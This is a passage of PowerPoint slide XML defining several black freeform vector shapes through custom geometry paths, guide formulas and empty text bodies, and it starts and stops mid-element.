              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10723" name="Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1218" y="2702"/>
                <a:ext cx="135" cy="40"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 135"/>
                  <a:gd name="T1" fmla="*/ 0 h 40"/>
                  <a:gd name="T2" fmla="*/ 132 w 135"/>
                  <a:gd name="T3" fmla="*/ 40 h 40"/>
                  <a:gd name="T4" fmla="*/ 135 w 135"/>
                  <a:gd name="T5" fmla="*/ 40 h 40"/>
                  <a:gd name="T6" fmla="*/ 5 w 135"/>
                  <a:gd name="T7" fmla="*/ 0 h 40"/>
                  <a:gd name="T8" fmla="*/ 0 w 135"/>
                  <a:gd name="T9" fmla="*/ 0 h 40"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 135"/>
                  <a:gd name="T16" fmla="*/ 0 h 40"/>
                  <a:gd name="T17" fmla="*/ 135 w 135"/>
                  <a:gd name="T18" fmla="*/ 40 h 40"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="135" h="40">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="132" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10724" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1241" y="2697"/>
                <a:ext cx="132" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 132"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 130 w 132"/>
                  <a:gd name="T3" fmla="*/ 35 h 35"/>
                  <a:gd name="T4" fmla="*/ 132 w 132"/>
                  <a:gd name="T5" fmla="*/ 35 h 35"/>
                  <a:gd name="T6" fmla="*/ 4 w 132"/>
                  <a:gd name="T7" fmla="*/ 0 h 35"/>
                  <a:gd name="T8" fmla="*/ 0 w 132"/>
                  <a:gd name="T9" fmla="*/ 0 h 35"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 132"/>
                  <a:gd name="T16" fmla="*/ 0 h 35"/>
                  <a:gd name="T17" fmla="*/ 132 w 132"/>
                  <a:gd name="T18" fmla="*/ 35 h 35"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="132" h="35">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10725" name="Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1231" y="2698"/>
                <a:ext cx="133" cy="39"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 133"/>
                  <a:gd name="T1" fmla="*/ 0 h 39"/>
                  <a:gd name="T2" fmla="*/ 130 w 133"/>
                  <a:gd name="T3" fmla="*/ 39 h 39"/>
                  <a:gd name="T4" fmla="*/ 133 w 133"/>
                  <a:gd name="T5" fmla="*/ 39 h 39"/>
                  <a:gd name="T6" fmla="*/ 3 w 133"/>
                  <a:gd name="T7" fmla="*/ 0 h 39"/>
                  <a:gd name="T8" fmla="*/ 0 w 133"/>
                  <a:gd name="T9" fmla="*/ 0 h 39"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 133"/>
                  <a:gd name="T16" fmla="*/ 0 h 39"/>
                  <a:gd name="T17" fmla="*/ 133 w 133"/>
                  <a:gd name="T18" fmla="*/ 39 h 39"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="133" h="39">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10726" name="Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1200" y="2236"/>
                <a:ext cx="249" cy="209"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 70 w 249"/>
                  <a:gd name="T1" fmla="*/ 14 h 209"/>
                  <a:gd name="T2" fmla="*/ 70 w 249"/>
                  <a:gd name="T3" fmla="*/ 14 h 209"/>
                  <a:gd name="T4" fmla="*/ 73 w 249"/>
                  <a:gd name="T5" fmla="*/ 14 h 209"/>
                  <a:gd name="T6" fmla="*/ 75 w 249"/>
                  <a:gd name="T7" fmla="*/ 13 h 209"/>
                  <a:gd name="T8" fmla="*/ 79 w 249"/>
                  <a:gd name="T9" fmla="*/ 11 h 209"/>
                  <a:gd name="T10" fmla="*/ 83 w 249"/>
                  <a:gd name="T11" fmla="*/ 10 h 209"/>
                  <a:gd name="T12" fmla="*/ 88 w 249"/>
                  <a:gd name="T13" fmla="*/ 9 h 209"/>
                  <a:gd name="T14" fmla="*/ 95 w 249"/>
                  <a:gd name="T15" fmla="*/ 8 h 209"/>
                  <a:gd name="T16" fmla="*/ 103 w 249"/>
                  <a:gd name="T17" fmla="*/ 6 h 209"/>
                  <a:gd name="T18" fmla="*/ 111 w 249"/>
                  <a:gd name="T19" fmla="*/ 4 h 209"/>
                  <a:gd name="T20" fmla="*/ 121 w 249"/>
                  <a:gd name="T21" fmla="*/ 3 h 209"/>
                  <a:gd name="T22" fmla="*/ 132 w 249"/>
                  <a:gd name="T23" fmla="*/ 2 h 209"/>
                  <a:gd name="T24" fmla="*/ 144 w 249"/>
                  <a:gd name="T25" fmla="*/ 1 h 209"/>
                  <a:gd name="T26" fmla="*/ 157 w 249"/>
                  <a:gd name="T27" fmla="*/ 0 h 209"/>
                  <a:gd name="T28" fmla="*/ 170 w 249"/>
                  <a:gd name="T29" fmla="*/ 0 h 209"/>
                  <a:gd name="T30" fmla="*/ 185 w 249"/>
                  <a:gd name="T31" fmla="*/ 0 h 209"/>
                  <a:gd name="T32" fmla="*/ 201 w 249"/>
                  <a:gd name="T33" fmla="*/ 0 h 209"/>
                  <a:gd name="T34" fmla="*/ 208 w 249"/>
                  <a:gd name="T35" fmla="*/ 28 h 209"/>
                  <a:gd name="T36" fmla="*/ 210 w 249"/>
                  <a:gd name="T37" fmla="*/ 29 h 209"/>
                  <a:gd name="T38" fmla="*/ 216 w 249"/>
                  <a:gd name="T39" fmla="*/ 34 h 209"/>
                  <a:gd name="T40" fmla="*/ 222 w 249"/>
                  <a:gd name="T41" fmla="*/ 39 h 209"/>
                  <a:gd name="T42" fmla="*/ 226 w 249"/>
                  <a:gd name="T43" fmla="*/ 50 h 209"/>
                  <a:gd name="T44" fmla="*/ 240 w 249"/>
                  <a:gd name="T45" fmla="*/ 117 h 209"/>
                  <a:gd name="T46" fmla="*/ 247 w 249"/>
                  <a:gd name="T47" fmla="*/ 145 h 209"/>
                  <a:gd name="T48" fmla="*/ 247 w 249"/>
                  <a:gd name="T49" fmla="*/ 146 h 209"/>
                  <a:gd name="T50" fmla="*/ 248 w 249"/>
                  <a:gd name="T51" fmla="*/ 152 h 209"/>
                  <a:gd name="T52" fmla="*/ 248 w 249"/>
                  <a:gd name="T53" fmla="*/ 160 h 209"/>
                  <a:gd name="T54" fmla="*/ 244 w 249"/>
                  <a:gd name="T55" fmla="*/ 170 h 209"/>
                  <a:gd name="T56" fmla="*/ 0 w 249"/>
                  <a:gd name="T57" fmla="*/ 163 h 209"/>
                  <a:gd name="T58" fmla="*/ 25 w 249"/>
                  <a:gd name="T59" fmla="*/ 150 h 209"/>
                  <a:gd name="T60" fmla="*/ 25 w 249"/>
                  <a:gd name="T61" fmla="*/ 28 h 209"/>
                  <a:gd name="T62" fmla="*/ 26 w 249"/>
                  <a:gd name="T63" fmla="*/ 27 h 209"/>
                  <a:gd name="T64" fmla="*/ 28 w 249"/>
                  <a:gd name="T65" fmla="*/ 25 h 209"/>
                  <a:gd name="T66" fmla="*/ 32 w 249"/>
                  <a:gd name="T67" fmla="*/ 24 h 209"/>
                  <a:gd name="T68" fmla="*/ 37 w 249"/>
                  <a:gd name="T69" fmla="*/ 23 h 209"/>
                  <a:gd name="T70" fmla="*/ 42 w 249"/>
                  <a:gd name="T71" fmla="*/ 22 h 209"/>
                  <a:gd name="T72" fmla="*/ 49 w 249"/>
                  <a:gd name="T73" fmla="*/ 22 h 209"/>
                  <a:gd name="T74" fmla="*/ 58 w 249"/>
                  <a:gd name="T75" fmla="*/ 23 h 209"/>
                  <a:gd name="T76" fmla="*/ 68 w 249"/>
                  <a:gd name="T77" fmla="*/ 27 h 20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49"/>
                  <a:gd name="T118" fmla="*/ 0 h 209"/>
                  <a:gd name="T119" fmla="*/ 249 w 249"/>
                  <a:gd name="T120" fmla="*/ 209 h 20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49" h="209">
                    <a:moveTo>
                      <a:pt x="68" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="70" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10727" name="Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1287" y="2251"/>
                <a:ext cx="79" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 79"/>
                  <a:gd name="T1" fmla="*/ 3 h 91"/>
                  <a:gd name="T2" fmla="*/ 78 w 79"/>
                  <a:gd name="T3" fmla="*/ 3 h 91"/>
                  <a:gd name="T4" fmla="*/ 77 w 79"/>
                  <a:gd name="T5" fmla="*/ 3 h 91"/>
                  <a:gd name="T6" fmla="*/ 74 w 79"/>
                  <a:gd name="T7" fmla="*/ 2 h 91"/>
                  <a:gd name="T8" fmla="*/ 72 w 79"/>
                  <a:gd name="T9" fmla="*/ 2 h 91"/>
                  <a:gd name="T10" fmla="*/ 69 w 79"/>
                  <a:gd name="T11" fmla="*/ 1 h 91"/>
                  <a:gd name="T12" fmla="*/ 65 w 79"/>
                  <a:gd name="T13" fmla="*/ 1 h 91"/>
                  <a:gd name="T14" fmla="*/ 60 w 79"/>
                  <a:gd name="T15" fmla="*/ 1 h 91"/>
                  <a:gd name="T16" fmla="*/ 56 w 79"/>
                  <a:gd name="T17" fmla="*/ 0 h 91"/>
                  <a:gd name="T18" fmla="*/ 50 w 79"/>
                  <a:gd name="T19" fmla="*/ 0 h 91"/>
                  <a:gd name="T20" fmla="*/ 44 w 79"/>
                  <a:gd name="T21" fmla="*/ 1 h 91"/>
                  <a:gd name="T22" fmla="*/ 38 w 79"/>
                  <a:gd name="T23" fmla="*/ 1 h 91"/>
                  <a:gd name="T24" fmla="*/ 31 w 79"/>
                  <a:gd name="T25" fmla="*/ 2 h 91"/>
                  <a:gd name="T26" fmla="*/ 25 w 79"/>
                  <a:gd name="T27" fmla="*/ 3 h 91"/>
                  <a:gd name="T28" fmla="*/ 18 w 79"/>
                  <a:gd name="T29" fmla="*/ 6 h 91"/>
                  <a:gd name="T30" fmla="*/ 11 w 79"/>
                  <a:gd name="T31" fmla="*/ 8 h 91"/>
                  <a:gd name="T32" fmla="*/ 4 w 79"/>
                  <a:gd name="T33" fmla="*/ 12 h 91"/>
                  <a:gd name="T34" fmla="*/ 4 w 79"/>
                  <a:gd name="T35" fmla="*/ 13 h 91"/>
                  <a:gd name="T36" fmla="*/ 3 w 79"/>
                  <a:gd name="T37" fmla="*/ 17 h 91"/>
                  <a:gd name="T38" fmla="*/ 1 w 79"/>
                  <a:gd name="T39" fmla="*/ 26 h 91"/>
                  <a:gd name="T40" fmla="*/ 0 w 79"/>
                  <a:gd name="T41" fmla="*/ 35 h 91"/>
                  <a:gd name="T42" fmla="*/ 0 w 79"/>
                  <a:gd name="T43" fmla="*/ 47 h 91"/>
                  <a:gd name="T44" fmla="*/ 0 w 79"/>
                  <a:gd name="T45" fmla="*/ 61 h 91"/>
                  <a:gd name="T46" fmla="*/ 2 w 79"/>
                  <a:gd name="T47" fmla="*/ 75 h 91"/>
                  <a:gd name="T48" fmla="*/ 6 w 79"/>
                  <a:gd name="T49" fmla="*/ 89 h 91"/>
                  <a:gd name="T50" fmla="*/ 7 w 79"/>
                  <a:gd name="T51" fmla="*/ 89 h 91"/>
                  <a:gd name="T52" fmla="*/ 8 w 79"/>
                  <a:gd name="T53" fmla="*/ 89 h 91"/>
                  <a:gd name="T54" fmla="*/ 9 w 79"/>
                  <a:gd name="T55" fmla="*/ 89 h 91"/>
                  <a:gd name="T56" fmla="*/ 11 w 79"/>
                  <a:gd name="T57" fmla="*/ 89 h 91"/>
                  <a:gd name="T58" fmla="*/ 15 w 79"/>
                  <a:gd name="T59" fmla="*/ 88 h 91"/>
                  <a:gd name="T60" fmla="*/ 18 w 79"/>
                  <a:gd name="T61" fmla="*/ 88 h 91"/>
                  <a:gd name="T62" fmla="*/ 22 w 79"/>
                  <a:gd name="T63" fmla="*/ 88 h 91"/>
                  <a:gd name="T64" fmla="*/ 27 w 79"/>
                  <a:gd name="T65" fmla="*/ 88 h 91"/>
                  <a:gd name="T66" fmla="*/ 32 w 79"/>
                  <a:gd name="T67" fmla="*/ 88 h 91"/>
                  <a:gd name="T68" fmla="*/ 38 w 79"/>
                  <a:gd name="T69" fmla="*/ 88 h 91"/>
                  <a:gd name="T70" fmla="*/ 44 w 79"/>
                  <a:gd name="T71" fmla="*/ 88 h 91"/>
                  <a:gd name="T72" fmla="*/ 50 w 79"/>
                  <a:gd name="T73" fmla="*/ 88 h 91"/>
                  <a:gd name="T74" fmla="*/ 57 w 79"/>
                  <a:gd name="T75" fmla="*/ 89 h 91"/>
                  <a:gd name="T76" fmla="*/ 64 w 79"/>
                  <a:gd name="T77" fmla="*/ 89 h 91"/>
                  <a:gd name="T78" fmla="*/ 71 w 79"/>
                  <a:gd name="T79" fmla="*/ 90 h 91"/>
                  <a:gd name="T80" fmla="*/ 79 w 79"/>
                  <a:gd name="T81" fmla="*/ 91 h 91"/>
                  <a:gd name="T82" fmla="*/ 79 w 79"/>
                  <a:gd name="T83" fmla="*/ 89 h 91"/>
                  <a:gd name="T84" fmla="*/ 78 w 79"/>
                  <a:gd name="T85" fmla="*/ 82 h 91"/>
                  <a:gd name="T86" fmla="*/ 77 w 79"/>
                  <a:gd name="T87" fmla="*/ 70 h 91"/>
                  <a:gd name="T88" fmla="*/ 76 w 79"/>
                  <a:gd name="T89" fmla="*/ 57 h 91"/>
                  <a:gd name="T90" fmla="*/ 76 w 79"/>
                  <a:gd name="T91" fmla="*/ 43 h 91"/>
                  <a:gd name="T92" fmla="*/ 76 w 79"/>
                  <a:gd name="T93" fmla="*/ 29 h 91"/>
                  <a:gd name="T94" fmla="*/ 77 w 79"/>
                  <a:gd name="T95" fmla="*/ 15 h 91"/>
                  <a:gd name="T96" fmla="*/ 78 w 79"/>
                  <a:gd name="T97" fmla="*/ 3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9"/>
                  <a:gd name="T148" fmla="*/ 0 h 91"/>
                  <a:gd name="T149" fmla="*/ 79 w 79"/>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9" h="91">
                    <a:moveTo>
                      <a:pt x="78" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
